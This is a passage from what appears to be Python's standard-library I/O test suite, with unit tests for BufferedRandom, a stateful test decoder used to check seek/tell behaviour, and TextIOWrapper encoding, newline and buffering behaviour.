with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
# You can't construct a BufferedRandom over a non-seekable stream.
test_unseekable = None
class CBufferedRandomTest(BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedRandom"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are period-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == ord('.'):
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the previous decoder for testing.
# Disabled by default, tests will enable it.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
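# Worked example (an informal reading of the I=0, O=6 case above, not
# executed anywhere): b'i.o6.x.xyz.toolongtofit.' decodes as follows. The
# leading 'i' word sets I=0 (variable-length mode), 'o6' sets O=6, then each
# period-terminated word is padded or truncated to 6 characters and a period
# is appended: 'x' -> 'x-----.', 'xyz' -> 'xyz---.', 'toolongtofit' -> 'toolon.'.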
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding="latin-1", newline="\r\n")
self.assertEqual(t.encoding, "latin-1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf-8", line_buffering=True)
self.assertEqual(t.encoding, "utf-8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_uninitialized(self):
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
del t
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
t.read, 0)
t.__init__(self.MockRawIO())
self.assertEqual(t.read(0), '')
def test_non_text_encoding_codecs_are_rejected(self):
# Ensure the constructor complains if passed a codec that isn't
# marked as a text encoding
# http://bugs.python.org/issue20404
r = self.BytesIO()
b = self.BufferedWriter(r)
with self.assertRaisesRegex(LookupError, "is not a text encoding"):
self.TextIOWrapper(b, encoding="hex")
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
# Operations independent of the detached stream should still work
repr(t)
self.assertEqual(t.encoding, "ascii")
self.assertEqual(t.errors, "strict")
self.assertFalse(t.line_buffering)
self.assertFalse(t.write_through)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertEqual(repr(t),
"<%s.TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.mode = "r"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname)
t.buffer.detach()
repr(t) # Should not raise an exception
def test_recursive_repr(self):
# Issue #25455
raw = self.BytesIO()
t = self.TextIOWrapper(raw)
with support.swap_attr(raw, 'name', t):
try:
repr(t) # Should not crash
except RuntimeError:
pass
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_reconfigure_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=False)
t.write("AB\nC")
self.assertEqual(r.getvalue(), b"")
t.reconfigure(line_buffering=True) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nC")
t.write("DEF\nG")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.write("H")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.reconfigure(line_buffering=False) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
t.write("IJ")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
# Keeping default value
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, False)
t.reconfigure(line_buffering=True)
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, True)
@unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled")
def test_default_encoding(self):
old_environ = dict(os.environ)
try:
# try to get a user-preferred encoding different from the current
# locale encoding to check that TextIOWrapper() uses the current
# locale encoding and not the user-preferred encoding
for key in ('LC_ALL', 'LANG', 'LC_CTYPE'):
if key in os.environ:
del os.environ[key]
current_locale_encoding = locale.getpreferredencoding(False)
b = self.BytesIO()
t = self.TextIOWrapper(b)
self.assertEqual(t.encoding, current_locale_encoding)
finally:
os.environ.clear()
os.environ.update(old_environ)
@support.cpython_only
@unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled")
def test_device_encoding(self):
# Issue 15989
import _testcapi
b = self.BytesIO()
b.fileno = lambda: _testcapi.INT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
b.fileno = lambda: _testcapi.UINT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf-8")
self.assertEqual(t.encoding, "utf-8")
t = self.TextIOWrapper(b)
self.assertIsNotNone(t.encoding)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(keepends=True)),
("", testdata.decode("ascii").splitlines(keepends=True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.TextIOWrapper(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception OSError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin-1", "utf-8" :# , "utf-16-be", "utf-16-le":
f = self.open(support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(support.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(support.TESTFN, "w+", encoding="utf-8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(OSError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
with self.open(support.TESTFN, "wb") as f:
f.write(line*2)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
s = f.read(prefix_size)
self.assertEqual(s, str(prefix, "ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
with self.open(support.TESTFN, "wb") as f:
f.write(data)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
#Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(support.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(support.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(support.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check if the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(OSError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO())
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_seek_append_bom(self):
# Same test, but first seek to the start and then to the end
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
with self.open(filename, 'a', encoding=charset) as f:
f.seek(0)
f.seek(0, self.SEEK_END)
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, "w") as f:
self.assertEqual(f.errors, "strict")
with self.open(support.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@support.no_tracing
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(support.TESTFN, "w", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=run, args=(x,))
for x in range(20)]
with support.start_threads(threads, event.set):
time.sleep(0.02)
with self.open(support.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
# Test that text file is closed despite failed flush
# and that flush() is called before file closed.
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
closed = []
def bad_flush():
closed[:] = [txt.closed, txt.buffer.closed]
raise OSError()
txt.flush = bad_flush
self.assertRaises(OSError, txt.close) # exception not swallowed
self.assertTrue(txt.closed)
self.assertTrue(txt.buffer.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
txt.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
txt.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(txt.closed)
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
txt.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(txt.closed)
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_unseekable(self):
txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata))
self.assertRaises(self.UnsupportedOperation, txt.tell)
self.assertRaises(self.UnsupportedOperation, txt.seek, 0)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises(AttributeError):
txt.buffer = buf
def test_rawio(self):
# Issue #12591: TextIOWrapper must work with raw I/O objects, so
# that subprocess.Popen() can have the required unbuffered
# semantics with universal_newlines=True.
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
# Reads
self.assertEqual(txt.read(4), 'abcd')
self.assertEqual(txt.readline(), 'efghi\n')
self.assertEqual(list(txt), ['jkl\n', 'opq\n'])
def test_rawio_write_through(self):
# Issue #12591: with write_through=True, writes don't need a flush
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n',
write_through=True)
txt.write('1')
txt.write('23\n4')
txt.write('5')
self.assertEqual(b''.join(raw._write_stack), b'123\n45')
def test_bufio_write_through(self):
# Issue #21396: write_through=True doesn't force a flush()
# on the underlying binary buffered object.
flush_called, write_called = [], []
class BufferedWriter(self.BufferedWriter):
def flush(self, *args, **kwargs):
flush_called.append(True)
return super().flush(*args, **kwargs)
def write(self, *args, **kwargs):
write_called.append(True)
return super().write(*args, **kwargs)
rawio = self.BytesIO()
data = b"a"
bufio = BufferedWriter(rawio, len(data)*2)
textio = self.TextIOWrapper(bufio, encoding='ascii',
write_through=True)
# write to the buffered io but don't overflow the buffer
text = data.decode('ascii')
textio.write(text)
# buffer.flush is not called with write_through=True
self.assertFalse(flush_called)
# buffer.write *is* called with write_through=True
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), b"") # no flush
write_called = [] # reset
textio.write(text * 10) # total content is larger than bufio buffer
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), data * 11) # all flushed
def test_reconfigure_write_through(self):
raw = self.MockRawIO([])
